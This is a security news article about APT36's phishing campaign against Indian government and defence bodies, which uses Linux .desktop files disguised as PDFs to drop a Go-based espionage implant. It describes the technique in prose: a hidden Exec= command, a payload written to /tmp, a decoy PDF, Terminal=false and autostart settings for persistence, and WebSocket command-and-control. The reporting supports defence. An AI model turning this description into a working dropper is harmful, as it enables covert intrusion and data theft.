APT36 Hackers Exploit Linux .desktop Files to Deploy Malware in Recent Attacks
The Pakistani APT36 cyberspies have been employing Linux .desktop files to deploy malware in targeted attacks against government and defence entities in India. This activity, as documented in reports by CYFIRMA and CloudSEK, is aimed at data exfiltration and establishing persistent espionage access. APT36 has a history of using .desktop files for malware deployment in espionage operations across South Asia. The attacks were first identified on August 1, 2025, and evidence suggests that they are still ongoing. Although the reports indicate different infrastructure and sample hashes, the techniques, tactics, and procedures (TTPs), attack chains, and objectives remain consistent. Victims receive ZIP archives via phishing emails, which contain a malicious .desktop file disguised as a PDF document.
When users open the .desktop file, believing it to be a PDF, a hidden bash command in the ‘Exec=’ field executes, creating a temporary filename in ‘/tmp/’ where it writes a hex-encoded payload sourced from the attacker’s server or Google Drive. The command then runs ‘chmod +x’ to make the payload executable and launches it in the background. To further reduce suspicion, the script also opens Firefox to display a benign decoy PDF file hosted on Google Drive. The attackers manipulate the ‘Exec=’ field to execute a series of shell commands and include fields like ‘Terminal=false’ to conceal the terminal window and ‘X-GNOME-Autostart-enabled=true’ to ensure the file runs at every login. Typically, .desktop files are plain-text shortcuts that define an icon, name, and command for execution. However, APT36 exploits this mechanism to create a malware dropper and establish persistence, akin to the abuse of ‘LNK’ shortcuts on Windows. Due to the text-based nature of .desktop files and the lack of documentation on their misuse, security tools on Linux are less likely to detect them as threats. The payload delivered by the compromised .desktop file is a Go-based ELF executable designed for espionage. Despite challenges in analysis due to packing and obfuscation, researchers discovered that the payload can remain hidden or attempt to establish its own persistence through cron jobs and systemd services. Communication with the command and control (C2) server occurs via a bi-directional WebSocket channel, facilitating data exfiltration and remote command execution. Both cybersecurity firms view this latest campaign as indicative of the evolving and increasingly sophisticated tactics employed by APT36.
Categories: Cyber Espionage, Malware Delivery Techniques, Linux Security Vulnerabilities
Tags: APT36, Cyberspies, Linux, .desktop Files, Malware, Data Exfiltration, Espionage, Phishing Emails, Payload, C2 Communication